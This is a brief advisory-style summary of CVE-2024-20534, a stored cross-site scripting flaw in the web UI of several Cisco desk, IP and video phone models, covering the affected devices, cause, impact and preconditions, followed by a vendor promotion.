CVE-2024-20534

Summary

CVE-2024-20534 is a newly discovered vulnerability that affects the web UI of several Cisco phone models, including the Cisco Desk Phone 9800 Series, IP Phone 6800, 7800, and 8800 Series, and Video Phone 8875 with Cisco Multiplatform Firmware. This issue permits authenticated, remote attackers to carry out stored cross-site scripting (XSS) attacks against users. The root cause of this vulnerability lies in the web UI of the affected devices, which fails to validate user-supplied input properly. An attacker can exploit this flaw by injecting malicious code into certain interface pages. A successful assault could lead to the execution of arbitrary script code in the context of the affected interface, or unauthorized access to sensitive browser-based information. It is important to note that for an attacker to exploit this vulnerability, they must have Admin credentials on the device and Web Access must be enabled on the phone, which is disabled by default.

Prevent cyber attacks with Recorded Future by prioritizing and patching critical vulnerabilities being exploited by threat actors targeting your industry. Book your demo to learn more.